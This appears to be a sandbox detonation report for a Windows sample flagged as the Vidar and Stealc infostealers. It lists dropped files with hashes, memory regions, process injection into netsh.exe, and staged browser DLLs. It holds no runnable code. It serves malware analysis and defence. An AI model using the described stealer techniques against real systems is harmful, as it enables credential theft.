C:\Users\Admin\AppData\Local\Temp\7c4bcf43

MD5 77ab4dae781342a5e5946789d00d4c6a
SHA1 d7c64e20b3ce078fc1094205ed5df08f42e540a8
SHA256 7da5a06dcaac6adebd6b8eff57e06c8f846f458e78b634f21d2ca741e9e46c36
SHA512 e675b45c07d1539598b45e4b879ecef47a8d97dfef4843d5b66ab537a14b2b24bf832f83d098e3bf65851b9f48287dc022ad1c405401d3dabef8701b4f9846cf

memory/408-13-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/408-16-0x0000000074C5E000-0x0000000074C60000-memory.dmp

memory/408-17-0x0000000074C51000-0x0000000074C5F000-memory.dmp

memory/408-20-0x0000000074C51000-0x0000000074C5F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/704-22-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/704-23-0x0000000000B80000-0x00000000012CC000-memory.dmp

memory/704-26-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\CAKFIJDHJEGI\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/704-100-0x0000000000B80000-0x00000000012CC000-memory.dmp

C:\ProgramData\BAKKEGCAAE.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/2584-114-0x0000000000D50000-0x0000000001263000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8308c106

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2584-120-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/2584-121-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

C:\ProgramData\BKKJKFBKKE.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/3368-132-0x0000000000520000-0x0000000000768000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\877bb061

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/3368-138-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/3368-139-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\EHJDHJ

MD5 59071590099d21dd439896592338bf95
SHA1 6a521e1d2a632c26e53b83d2cc4b0edecfc1e68c
SHA256 07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541
SHA512 eedb6cadbceb2c991fc6f68dccb80463b3f660c5358acd7d705398ae2e3df2b4327f0f6c6746486848bd2992b379776483a98063ae96edb45877bb0314874668

memory/704-174-0x0000000000B80000-0x00000000012CC000-memory.dmp

memory/704-175-0x0000000000B80000-0x00000000012CC000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\EBGCGH

MD5 bed7fc66d3b015a77ecbb8a825c3eb1b
SHA1 324662d03b11e4a649a7458aa57a40f250f5fc18
SHA256 6778e40c106193ba06e541b347f1afa36bdd64bcbcce1547e3db1aecbfa5f854
SHA512 c42313248dd9d07acb4eaf2592cfb855f7f0d7208d779c4e44e9d5946117639bb4713ab21b0e84e20eba81d8d0546b5d0e628a737d31a12632bc0254d79e4534

memory/704-186-0x0000000000B80000-0x00000000012CC000-memory.dmp

memory/2584-187-0x0000000072970000-0x0000000072AED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\84f7268b

MD5 65003d377eca75f9351a39e45d69f234
SHA1 33c501b08925dceb4027c14fa3c1a0a6351b75a8
SHA256 c8a6fc14e70e5f09bd5a8b1559fde1b95c9aa4694b1d5e2835d778a610b70f70
SHA512 f579f5a1845f1400a6554df0311785723783988339ca483407fa329b243a2bd40da7de7563c83cdea5ba1cbe4616e50d28740ca6749f2c202e52059363fb334f

memory/3368-190-0x0000000072970000-0x0000000072AED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8998412e

MD5 52ad7bef358ade6bc07f6c87d999bd5e
SHA1 a9fe6380c91db9faa4fc4370b42908ad21551d4b
SHA256 93c5852dc277f3865e055325449f4abae2441618cb3a859a2f851453d5e9f847
SHA512 2fa46b2ee1d36c66aebcaaa8bccda63ad215602d5f10abb18a035fff517dbf13ff5a8148d11996ee577cf6576638be6957e0ac0a292d9cfe994604cb81fd9032

memory/1580-193-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/1728-194-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\CAKFIJDHJEGI\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\CAKFIJDHJEGI\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/1580-200-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/1580-210-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/4528-214-0x00007FF8C61E0000-0x00007FF8C7880000-memory.dmp

memory/4528-217-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3616-218-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/2168-222-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-224-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-226-0x00000219EBFC0000-0x00000219EBFE0000-memory.dmp

memory/2168-225-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-227-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-230-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-229-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-228-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-231-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3616-232-0x0000000000380000-0x00000000003F1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 fde517015fe00ce619a68e316a67cb5d
SHA1 9ec8bf6078f520af08de3ccee6e814d49ee8b2a4
SHA256 fa3c6e1c629924ae0ec043c17966413ff5ead455e764806babea0860408cf731
SHA512 fcc343ab3771011a97e94360ccc6a6782e9afded72c429bf517694f613e8a19418656d650e76d1f75f4bd6e0820c7f480a09583172cc4b64d64e2ee936d3570d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 019e53c242fe603d78d0780c4c7205ee
SHA1 7dc37b1e39567daa7e30f4927f917a9399913eac
SHA256 ca8d8c57354df6c562d65f64f8b77cc60b23a086dc728df3ba216d583b71fbc2
SHA512 8ad9ebd431c08e2dcb3679f53daa475380b08a8f7e93049a8e1a2193b5470e38ab9cc7f27ad328791ce75f316b37cc39d55fe401a3fecb05b937e5b51320f636

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8390b77e8f2216f046f042c509b68228
SHA1 a079b53e03a23e1d19fecd41d9f980a05ba706bb
SHA256 fa05f7c1ecf6b53c66694bea11433cf8615fc058a88b635b592a9c8b05da973c
SHA512 45a8ae8d68329cab404f33edbf017e610e64e06d3bb111e7634c34ac8850141401d1c6fc44f79b19bb9abf095955a835c57d56523f1d43e88420648e4d32b603

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1

MD5 1e49c49df1e9bb5a3646fbdd72fff72d
SHA1 ca3b2f92797030ad96341c5551812e679e9746d3
SHA256 df52ed4a147cad99aec03614368f8781e806c45be6e046ec4a73a26e7ec9cd10
SHA512 b0c96599de30f1822ddc99d1fed6341ae06f25a171c52b9a78f6304d02a30f8da41738d4af4b4c8365b0b52739b3df03be99dddf764f12f724bd24a91b59c82d

memory/3172-246-0x0000000002FD0000-0x0000000003006000-memory.dmp

memory/3172-247-0x0000000005AA0000-0x00000000060CA000-memory.dmp

memory/3172-248-0x0000000005930000-0x0000000005952000-memory.dmp

memory/3172-249-0x0000000006240000-0x00000000062A6000-memory.dmp

memory/3172-250-0x00000000062B0000-0x0000000006316000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvf2dhmx.ylk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3172-259-0x0000000006400000-0x0000000006757000-memory.dmp

memory/3172-260-0x00000000067D0000-0x00000000067EE000-memory.dmp

memory/3172-261-0x0000000006820000-0x000000000686C000-memory.dmp

memory/3172-264-0x0000000007A30000-0x0000000007AC6000-memory.dmp

memory/3172-265-0x0000000006D10000-0x0000000006D2A000-memory.dmp

memory/3172-266-0x0000000006DA0000-0x0000000006DC2000-memory.dmp

memory/3172-267-0x0000000008080000-0x0000000008626000-memory.dmp

memory/3172-268-0x0000000008CB0000-0x000000000932A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 17:40

Reported

2024-06-17 17:43

Platform

win7-20240611-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2580 set thread context of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 148

Network

N/A

Files

memory/2580-0-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/2580-1-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/2580-7-0x00000000743B2000-0x00000000743B4000-memory.dmp

memory/2580-8-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/2580-9-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/1964-11-0x00000000743A0000-0x0000000074514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1baacc4c

MD5 d821207af26672d1cb2f002ce762f31c
SHA1 12f85154ab78708436a7c53ad8a531f6de287a97
SHA256 ba65519d929fac172cfa2434ec5dabbb974c159bd6be6ef5bf7e9bf23bd799a1
SHA512 adfb0f065fb2e3563c77c5385dee5398b0fe8a611972cac51d24cb152deae89f865447b0b31f4dbdecdc0a7ef49b55de180579ebcb254cd8aa7b7a5379362e2b

memory/1964-13-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/1964-15-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/1964-18-0x00000000743A0000-0x0000000074514000-memory.dmp

\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/2764-22-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2764-21-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1964-23-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/2764-25-0x0000000000AE0000-0x000000000122C000-memory.dmp

memory/2764-34-0x0000000000AE0000-0x000000000122C000-memory.dmp